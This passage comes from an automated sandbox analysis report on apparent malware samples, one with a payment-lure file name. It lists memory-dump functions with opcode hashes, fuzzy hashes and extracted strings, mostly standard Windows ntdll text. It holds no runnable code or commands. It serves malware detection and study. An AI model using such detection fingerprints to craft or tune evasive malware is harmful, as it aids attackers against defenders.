Opcode Fuzzy Hash: 08c05e575e2ec3df0dfc37e96ed84bc7caa4039d2e7eef610aa1f16e6304b4d7
Instruction Fuzzy Hash: 9190023325180403D104715848087471005A7D1302F96C051A5164556EC765C9916631

Function 01B02F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5698338211144f29f5e2a2cc2142293b685ddd98edb77c1ec9318cd23d8b24
Instruction ID: 0b287b7f6bec4960d50bfb1780a05c394141b4e1664cdfa3382660ba78b282da
Opcode Fuzzy Hash: 2d5698338211144f29f5e2a2cc2142293b685ddd98edb77c1ec9318cd23d8b24
Instruction Fuzzy Hash: FD90023325180403D1047158481470B1005A7D1302F96C051A1164556DC72589516671

Function 01B02FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc9310cb0ffcee7edd9036634eeebe6cc9170585089c1738d01bcba2f4902a9
Instruction ID: d77686658f4c08185f111b663159b1b7c3125a4f158ce35bb587f5f7e415e93c
Opcode Fuzzy Hash: 7bc9310cb0ffcee7edd9036634eeebe6cc9170585089c1738d01bcba2f4902a9
Instruction Fuzzy Hash: D5900223261C0043D20475684C14B071005A7D1303F96C155A0154555CCB1589615621

Function 01B02F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be89e1491c931fbd7257e483fd4d1398d68c675904e400f2ea8a383b60b5f1a5
Instruction ID: e75395659fc773950bf3a50e88abcdbd215e6a293cc02439078b6e7ee5bd0be9
Opcode Fuzzy Hash: be89e1491c931fbd7257e483fd4d1398d68c675904e400f2ea8a383b60b5f1a5
Instruction Fuzzy Hash: 5490026339140443D10471584414B061005E7E2301F96C055E1064555DC719CD526226

Function 01B02F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a89e97b2fe4740324362c36030290301e68c32825356776ced129740c17e60
Instruction ID: 493c7dce4ab46547a65de64ba08c17c1f107c8996826dbae6eebbaf25a5facfc
Opcode Fuzzy Hash: 59a89e97b2fe4740324362c36030290301e68c32825356776ced129740c17e60
Instruction Fuzzy Hash: 2690026326140043D108715844047061045A7E2201F96C052A2154555CC7298D615225

Function 01B02EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4227b8a02652ba03b2f5575b62f910bba72f444c091d2ddbdbd5d4089fecea4a
Instruction ID: c980b8dc65299e092736d7e6502380af9aec2bbdb97fd917c0e81de06bb011f5
Opcode Fuzzy Hash: 4227b8a02652ba03b2f5575b62f910bba72f444c091d2ddbdbd5d4089fecea4a
Instruction Fuzzy Hash: 3890027325140403D144715844047461005A7D1301F96C051A5064555EC7598ED56765

Function 01B02E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c9a4217e983532ebefa9e806d4aabbe6af13ccbffe8230d85e7f3eb0c51ca9
Instruction ID: 62772a1e11f2396f138cd9c70b8d6a77a420296c8859144763e1d347c19ea63b
Opcode Fuzzy Hash: d1c9a4217e983532ebefa9e806d4aabbe6af13ccbffe8230d85e7f3eb0c51ca9
Instruction Fuzzy Hash: FC90022365140503D10571584404616100AA7D1241FD6C062A1024556ECB258A92A231

Function 01B02EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccec3136e86f7dbf7a184e51b63033ec5edd3c76df213d1543e7466ae53203be
Instruction ID: 0e27f76b47c3003fdb152bee99be53704f1a441d8fa6ce64c884b1e942218e84
Opcode Fuzzy Hash: ccec3136e86f7dbf7a184e51b63033ec5edd3c76df213d1543e7466ae53203be
Instruction Fuzzy Hash: AD90026325180403D144755848046071005A7D1302F96C051A2064556ECB298D516235

Function 01B02E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6fa9771ed92f29794c1411daf1dde8cc659c59ee213f52fad7de7dab28d92b1
Instruction ID: b7ff024348ffdaa2826679db61a995e6749ab9116c002f4b5303327a78785436
Opcode Fuzzy Hash: a6fa9771ed92f29794c1411daf1dde8cc659c59ee213f52fad7de7dab28d92b1
Instruction Fuzzy Hash: 3790022335140403D106715844146061009E7D2345FD6C052E1424556DC7258A53A232

Function 01B03090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 342e4257dbc2443d51de3b7190b1d4debdd1ed3fea7b6b0d230cc7fb84254ee4
Instruction ID: ad470b2e7366bd77d00ee74ba43a13fecbe32872bbf22fdbd3e089bcb19a72e5
Opcode Fuzzy Hash: 342e4257dbc2443d51de3b7190b1d4debdd1ed3fea7b6b0d230cc7fb84254ee4
Instruction Fuzzy Hash: E090022329140803D144715884147071006E7D1601F96C051A0024555DC7168A6567B1

Function 01B03010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 425fca5dc9fb4e6cb7075f33574555b7595d576f472b27c5a17f8adfd4eebd14
Instruction ID: 7faa3174e0f707568afac0aa5ee057ea1dfe73941555ccb4a5d34b888ac9e229
Opcode Fuzzy Hash: 425fca5dc9fb4e6cb7075f33574555b7595d576f472b27c5a17f8adfd4eebd14
Instruction Fuzzy Hash: 1490022325184443D14472584804B0F5105A7E2202FD6C059A4156555CCB1589555721

Function 01B039B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ccfe1823a322b43116f92573dcf5e36d2a37b463133172f0fa7fe6a6286842
Instruction ID: 8992b0f5934442fdc5e24e531a79dce1742ffc986f65c7f6363c40baaa1bb9f2
Opcode Fuzzy Hash: 25ccfe1823a322b43116f92573dcf5e36d2a37b463133172f0fa7fe6a6286842
Instruction Fuzzy Hash: 0490022329545103D154715C44046165005B7E1201F96C061A0814595DC75589556321

Function 01B03D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d439819d583ed91569ffd3b6e9c94bb7416ea47334cc60602f862a87c0e90f
Instruction ID: 58f62ec6e64a21acac69bd2a7eea8bbb0304b8f111fbe9ddca0a9b5b563e11d6
Opcode Fuzzy Hash: d9d439819d583ed91569ffd3b6e9c94bb7416ea47334cc60602f862a87c0e90f
Instruction Fuzzy Hash: 4190023325240143954472585804A4E5105A7E2302BD6D455A0015555CCB1489615321

Function 01B03D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bfbcaf0b8473556cf6a51d6a944d1637de5ee3558a2dbcd3d8832bcdfbc0604
Instruction ID: f77bcc429b02202303ed978ad4945048193579f91d8bd432f4ca270714dfe2b7
Opcode Fuzzy Hash: 1bfbcaf0b8473556cf6a51d6a944d1637de5ee3558a2dbcd3d8832bcdfbc0604
Instruction Fuzzy Hash: E690023725140403D514715858046461046A7D1301F96D451A0424559DC75489A1A221

Function 01B02C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: caa77a58f1bb11d3cb35d62178895d040917d10b3a257e310d28d265acf7dcfe
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01B02890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B0293C
___swprintf_l.LIBCMT ref: 01B0295E
___swprintf_l.LIBCMT ref: 01B029A3
___swprintf_l.LIBCMT ref: 01B3A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01B3A54E
ffff:, xrefs: 01B3A504
:%u.%u.%u.%u, xrefs: 01B3A5B8
::%hs%u.%u.%u.%u, xrefs: 01B3A527

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 6885db58d66797205c06fb407a650ea7f367862a0076746940717f2d0ceb6497
Instruction ID: bb536534e594359fcb40feda5d21c2d59b406a98db313d0ccbfb2c470c6e2301
Opcode Fuzzy Hash: 6885db58d66797205c06fb407a650ea7f367862a0076746940717f2d0ceb6497
Instruction Fuzzy Hash: 1051E8B5A00216BFCF1ADBAC889497EFBB8FF4824075082E9F595D7681D334DE5487A0

Function 01B72410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B724A6
___swprintf_l.LIBCMT ref: 01B724E2
___swprintf_l.LIBCMT ref: 01B7257D
___swprintf_l.LIBCMT ref: 01B725A3
___swprintf_l.LIBCMT ref: 01B725C8
___swprintf_l.LIBCMT ref: 01B72608

Strings

::%hs%u.%u.%u.%u, xrefs: 01B7249E
::ffff:0:%u.%u.%u.%u, xrefs: 01B724DA
:%u.%u.%u.%u, xrefs: 01B725FF
ffff:, xrefs: 01B7247D, 01B7249D

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2c21d824662d346cd372bd8e7742001bfee065df8843ff47f263cc1a96f2364d
Instruction ID: 04bf4689ed40438a4dba96ca9472be5443e640c0e433c5d6c98ac7be6a15a8be
Opcode Fuzzy Hash: 2c21d824662d346cd372bd8e7742001bfee065df8843ff47f263cc1a96f2364d
Instruction Fuzzy Hash: A351F775A00645AEDF39DF9CC89097FBBF8EF44200B4484DAF5A6D7642E774EA408760

Function 01AF7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B34725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B34655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B346FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B34742
Execute=1, xrefs: 01B34713
ExecuteOptions, xrefs: 01B346A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 01B34787

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 4e0ed80c2238873b63872bfc01ceed8ad1831107777ba176053522f213894bdc
Instruction ID: 8c88f84b4780a36f41164d014a53e17a76db4ddc34deb327a2474a75552541c4
Opcode Fuzzy Hash: 4e0ed80c2238873b63872bfc01ceed8ad1831107777ba176053522f213894bdc
Instruction Fuzzy Hash: 0351C431600219BAEF25ABE9DC85FBA7BB8EF58304F0400EDF705A7191EB719A558B50

Function 01B96940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 287513145dd0ea4b14b2d8b4d1e27525e8a87e7cbc44b7b6eb8f3c2eeef2dccf
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 91022971508341AFDB09CF18C490A6FBBE5EFC8700F1489ADF9958B264DB31E906CB92

Function 01B0B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01B0B6BF

Strings

0, xrefs: 01B0B695
0, xrefs: 01B0B66F
-, xrefs: 01B0B650
+, xrefs: 01B0B65A

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 42700481badd0dde5538384b8b4710b8e8c831d03467f76a96dad2babcc9a665
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 2A81B178E052499EEF2F8E6CCA517BEBFB1EF45310F1846D9E861A72E1C73489408B51

Function 01B720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B7214F
___swprintf_l.LIBCMT ref: 01B72172

Strings

]:%u, xrefs: 01B72169
%%%u, xrefs: 01B72146
[, xrefs: 01B7212B

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 711e84c40b15eefd8db085e50d02b84a7d5ab872cc7dd0e24b60e489b45ee204
Instruction ID: 4d0c11131b5d8f89f99d9e8c3ee2ea1fb5184da4bc3cc113171c9c78881b56bc
Opcode Fuzzy Hash: 711e84c40b15eefd8db085e50d02b84a7d5ab872cc7dd0e24b60e489b45ee204
Instruction Fuzzy Hash: ED21C77AE00159ABDB15DF7ADC40AFE7BF8FF54640F040196EA14D3600E730DA018BA0

Function 01AEF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B302E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B302BD
RTL: Re-Waiting, xrefs: 01B3031E

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 4c7e57c8b6fb641a96b31763cdb1bc8f12ed65d5c4aaf5afbf90549300da7181
Instruction ID: 01ae40d6f579935d050dd734b386ebf2d04fae768837f504cbaa97444523ae0a
Opcode Fuzzy Hash: 4c7e57c8b6fb641a96b31763cdb1bc8f12ed65d5c4aaf5afbf90549300da7181
Instruction Fuzzy Hash: 9CE19E706047419FEB29DF28C888B2ABBE0FF88314F144A9DF5A58B2E1D774D955CB42

Function 01AFBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B37B7F
RTL: Re-Waiting, xrefs: 01B37BAC
RTL: Resource at %p, xrefs: 01B37B8E

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 325d7278f4e8f0dd5774d334df943c6f51461519463bd8d6f69ee75b98d16883
Instruction ID: 244b88852548a8f870e7db93d8861ec4cc414daca38110dc543b26360d088554
Opcode Fuzzy Hash: 325d7278f4e8f0dd5774d334df943c6f51461519463bd8d6f69ee75b98d16883
Instruction Fuzzy Hash: 7741E2757007029FDB29DF29C850B6AB7F5EF88710F100A5DFA56DB680DB31E4058BA1

Function 01AFB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B3728C

Strings

RTL: Re-Waiting, xrefs: 01B372C1
RTL: Resource at %p, xrefs: 01B372A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B37294

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 4d5d542d3a75ba3e1bf3bd25491cfeb1ac97700cd35eb958c21b18ad5b48f9d1
Instruction ID: 3b26f03e99f72d8472c64c6976ab0e78daa3c76ff5ba5731044514620a0a580d
Opcode Fuzzy Hash: 4d5d542d3a75ba3e1bf3bd25491cfeb1ac97700cd35eb958c21b18ad5b48f9d1
Instruction Fuzzy Hash: 06413271700202ABCB29CF69CC41F6AB7B1FB95710F10065CFA55EB280DB30E8168BE0

Function 01B72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B7238D
___swprintf_l.LIBCMT ref: 01B723B3

Strings

%%%u, xrefs: 01B72384
]:%u, xrefs: 01B723AA

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 6aaa2e4bdb6bb9e7df4820896e7d4a28e0305a6cfe5c04251c0a2108cad8f465
Instruction ID: b98112cbbaf098b96a10447ab9e9945cbf296554f848a52e24c3d0524cd2d298
Opcode Fuzzy Hash: 6aaa2e4bdb6bb9e7df4820896e7d4a28e0305a6cfe5c04251c0a2108cad8f465
Instruction Fuzzy Hash: 35317872A002199FDB25DF2DDC80BEE77F8FF54610F4545D5E959E3240EB30AA448BA0

Function 01B07D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01B07E8B

Strings

+, xrefs: 01B07DE8
-, xrefs: 01B07DDD

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 2979dc55c6c6f88b2136107e7ecf2292fa7d7d880f6b3578ea63358a0e613e15
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 8E918571E002569ADF2ADF5DC8806BEFFA5EF44360F14469AE995A72C0EF30AD408751

Function 01AC9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01AC9175
$, xrefs: 01AC9191

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 7b19c872ad8db376600ded229b88dc88b931fd0aa001f86ad1b55b4a0d99e95d
Instruction ID: 88e08f3c2340b24d457c801607c20c9a1115e3ceec1a0a9289f00339b54b5258
Opcode Fuzzy Hash: 7b19c872ad8db376600ded229b88dc88b931fd0aa001f86ad1b55b4a0d99e95d
Instruction Fuzzy Hash: 8A810C72D002699BDB36CF54CD45BEABBB4AB48714F0041DAEA1DB7250D7709E84CFA0

Analysis Process: xIrbjTuvDXL.exePID: 1268, Parent PID: 1520COMMON

Executed Functions

Function 02CBBEB3 Relevance: 38.0, Strings: 30, Instructions: 454COMMON

Download Yara Rule

Strings

v", xrefs: 02CBC206
WA, xrefs: 02CBC00C
vO, xrefs: 02CBBF7A
", xrefs: 02CBC257
1, xrefs: 02CBC0FC
-, xrefs: 02CBBFC4
#, xrefs: 02CBC048
t, xrefs: 02CBC106
y, xrefs: 02CBC24D
b, xrefs: 02CBC26C
:, xrefs: 02CBC162
d, xrefs: 02CBC124
BA, xrefs: 02CBC5BD
?%, xrefs: 02CBC339
c}, xrefs: 02CBC1AF
:, xrefs: 02CBC18A
(, xrefs: 02CBC2C3
+, xrefs: 02CBC0CE
^, xrefs: 02CBC2D7
6, xrefs: 02CBC08B
<V, xrefs: 02CBC21A
Pf, xrefs: 02CBC2F2
], xrefs: 02CBBF92
T, xrefs: 02CBC034
-O, xrefs: 02CBC1CD
(, xrefs: 02CBC0B0
C, xrefs: 02CBC110
8L, xrefs: 02CBBFCE
,, xrefs: 02CBC1A5
Pf, xrefs: 02CBC7E1

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$BA$C$Pf$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
API String ID: 0-904472534
Opcode ID: e2ecdfe0f902322b6687ed87d2fcfc74968e6fbb0bd80ab0926a2ccf7a202c26
Instruction ID: fbd14ce60d51cdadc9632dc2e24b40ee677c6dd62c53c9ae4582678eb026c4d0
Opcode Fuzzy Hash: e2ecdfe0f902322b6687ed87d2fcfc74968e6fbb0bd80ab0926a2ccf7a202c26
Instruction Fuzzy Hash: D842CEB0D0522ACFDB29CF45C984BEEBBB2BF44308F1081DAC5196B684D3B55A89DF40

Function 02CC9B21 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

O, xrefs: 02CC9BAF
6, xrefs: 02CC9BB6
S, xrefs: 02CC9BA1
s, xrefs: 02CC9BA8
@4>J, xrefs: 02CC9C77

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: 6$@4>J$O$S$s
API String ID: 0-336573888
Opcode ID: 94e6597995a73f935c06304a49a16b53ce926cb609bda062f4111f56fc906bb8
Instruction ID: 8f0edfc0dbafb4f885f75b9e80c1c660be2624532568bc7a8249551bb893a25e
Opcode Fuzzy Hash: 94e6597995a73f935c06304a49a16b53ce926cb609bda062f4111f56fc906bb8
Instruction Fuzzy Hash: A1518FB2D01218AADB10DBA4DC85BFEB3B9EB48314F1081A9EE0966140E7719B44DFA1

Function 02CD6E61 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

.|, xrefs: 02CD6EA0

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: .|
API String ID: 0-325920452
Opcode ID: 178c32d8e1404a5789e4a2b4f9abf3e5fd93f9c54762f527bd92632bee4a25b9
Instruction ID: bbbc4ff6028e5c0d5505cdd9f89a829c1a91b2e062dd0c2beaaf5fbde189f872
